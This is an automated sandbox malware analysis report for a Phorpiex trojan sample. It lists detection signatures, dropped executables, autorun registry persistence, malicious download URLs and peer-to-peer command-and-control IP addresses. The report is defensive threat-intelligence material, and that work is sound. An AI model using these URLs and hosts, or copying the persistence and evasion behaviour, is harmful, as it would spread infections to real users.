Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
957C4XK6Lt.exe

Overview

General Information

Sample name:957C4XK6Lt.exe
renamed because original name is a hash value
Original sample name:f33c75710d0e0463a2528e619c2ee382.exe
Analysis ID:1430850
MD5:f33c75710d0e0463a2528e619c2ee382
SHA1:4d2dd071fe274e6a8696448c21eeeecc0cf07e6d
SHA256:ec7dd08d03d5d4142c82fc04cea7e948d05641b0a3008a0d8a00b0421b5b04f9
Tags:32exetrojan
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Phorpiex
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 957C4XK6Lt.exe (PID: 3748 cmdline: "C:\Users\user\Desktop\957C4XK6Lt.exe" MD5: F33C75710D0E0463A2528E619C2EE382)
    • 135143440.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\135143440.exe MD5: 36010B83BCCFCD1032971DF9FC5082A1)
      • 1682018248.exe (PID: 6528 cmdline: C:\Users\user\AppData\Local\Temp\1682018248.exe MD5: CD1D9C0ED8763E6BB3EE7EFB133DC60E)
  • sysvratrel.exe (PID: 5676 cmdline: "C:\Users\user\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)
  • sysvratrel.exe (PID: 2012 cmdline: "C:\Windows\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)
  • sysvratrel.exe (PID: 6196 cmdline: "C:\Users\user\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\sysvratrel.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    C:\Users\user\sysvratrel.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Temp\1682018248.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          C:\Users\user\AppData\Local\Temp\135143440.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            SourceRuleDescriptionAuthorStrings
            00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      Click to see the 12 entries
                      SourceRuleDescriptionAuthorStrings
                      5.2.sysvratrel.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        7.0.sysvratrel.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          6.2.1682018248.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            8.2.sysvratrel.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              7.2.sysvratrel.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                                Click to see the 5 entries
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\sysvratrel.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\135143440.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysvratrel.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\135143440.exe, ProcessId: 6684, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                                Timestamp:04/24/24-10:09:33.285933
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:51.958250
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:06:57.287872
                                SID:2856563
                                Source Port:59936
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:13.394595
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:32.035369
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:11.867133
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:58.363225
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:23.285105
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:48.347692
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:31.911742
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:11.988207
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:53.363437
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:46.957752
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:18.287284
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:56.957867
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:26.909948
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:48.239817
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:01.978212
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:21.863771
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:48.476371
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:53.507363
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:43.459613
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:18.414506
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:58.253867
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:23.425986
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:16.864431
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:03.378900
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:43.222645
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:53.254442
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:33.442451
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:22.004023
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:28.285044
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:43.348638
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:58.504112
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:10:28.442260
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:13.269540
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:07:41.942141
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:27.019326
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:08:16.989023
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:04/24/24-10:09:03.253978
                                SID:2044077
                                Source Port:59141
                                Destination Port:40500
                                Protocol:UDP
                                Classtype:A Network Trojan was detected

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: http://twizt.net/peiAvira URL Cloud: Label: malware
                                Source: http://twizt.net/newAvira URL Cloud: Label: malware
                                Source: http://185.215.113.66/1DAvira URL Cloud: Label: malware
                                Source: http://185.215.113.66/383(Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%userAvira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.php5%zAvira URL Cloud: Label: malware
                                Source: http://twizt.net/newtpp.z%Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/Avira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.phpbAvira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.phpshqos.dll.muiS9Avira URL Cloud: Label: malware
                                Source: http://twizt.net/newtpp.exeP0SAvira URL Cloud: Label: malware
                                Source: http://185.215.113.66/1~Avira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.phpm%Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/5Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/4Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/3Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/2Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/6Avira URL Cloud: Label: malware
                                Source: http://185.215.113.66/1Avira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.php%temp%%sAvira URL Cloud: Label: malware
                                Source: http://twizt.net/newtpp.exeP0Avira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.phpystem32Avira URL Cloud: Label: malware
                                Source: http://twizt.net/=Avira URL Cloud: Label: malware
                                Source: http://twizt.net/newtpp.exeAvira URL Cloud: Label: malware
                                Source: http://twizt.net/peinstall.phpAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\sysvratrel.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\sysvratrel.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: twizt.netVirustotal: Detection: 21%Perma Link
                                Source: http://91.202.233.141/Virustotal: Detection: 8%Perma Link
                                Source: http://twizt.net/peiVirustotal: Detection: 14%Perma Link
                                Source: http://twizt.net/newVirustotal: Detection: 14%Perma Link
                                Source: http://185.215.113.66/1DVirustotal: Detection: 17%Perma Link
                                Source: http://91.202.233.141/5Virustotal: Detection: 5%Perma Link
                                Source: http://91.202.233.141/6Virustotal: Detection: 5%Perma Link
                                Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%userVirustotal: Detection: 16%Perma Link
                                Source: http://91.202.233.141/4Virustotal: Detection: 5%Perma Link
                                Source: http://twizt.net/peinstall.phpbVirustotal: Detection: 14%Perma Link
                                Source: http://185.215.113.66/1~Virustotal: Detection: 15%Perma Link
                                Source: http://185.215.113.66/Virustotal: Detection: 17%Perma Link
                                Source: http://185.215.113.66/5Virustotal: Detection: 18%Perma Link
                                Source: http://185.215.113.66/4Virustotal: Detection: 18%Perma Link
                                Source: http://193.233.132.177/Virustotal: Detection: 7%Perma Link
                                Source: http://185.215.113.66/3Virustotal: Detection: 18%Perma Link
                                Source: http://185.215.113.66/2Virustotal: Detection: 18%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeReversingLabs: Detection: 64%
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeReversingLabs: Detection: 64%
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeReversingLabs: Detection: 79%
                                Source: C:\Users\user\sysvratrel.exeReversingLabs: Detection: 64%
                                Source: C:\Windows\sysvratrel.exeReversingLabs: Detection: 64%
                                Source: 957C4XK6Lt.exeReversingLabs: Detection: 68%
                                Source: 957C4XK6Lt.exeVirustotal: Detection: 55%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\sysvratrel.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1682018248.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\sysvratrel.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exeJoe Sandbox ML: detected
                                Source: 957C4XK6Lt.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040C0C0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040C0C0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,8_2_0040C0C0

                                Phishing

                                barindex
                                Source: Yara matchFile source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
                                Source: 957C4XK6Lt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: 957C4XK6Lt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_00406650
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406510
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00406650
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406510
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,8_2_00406650
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00406510

                                Networking

                                barindex
                                Source: TrafficSnort IDS: 2856563 ETPRO TROJAN Phorpiex Domain in DNS Lookup 192.168.2.6:59936 -> 1.1.1.1:53
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 120.237.99.181:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 85.113.19.18:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.152.6:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.114.186.50:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.71.69.217:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 36.20.68.95:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.180.157.70:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 186.94.185.219:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 197.148.34.173:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.190.214:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 39.53.75.107:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.218.235.182:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.58.18.206:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.54.5:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 217.20.222.188:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 91.234.219.185:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 41.102.227.47:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.74.170:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.185.146.181:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.194.11.2:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 37.20.161.137:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 151.233.73.168:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.219.115.32:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 128.65.176.18:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 212.112.112.84:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.47.124.54:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 181.114.188.143:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.236.226.70:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 46.35.86.48:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.190.224.61:40500
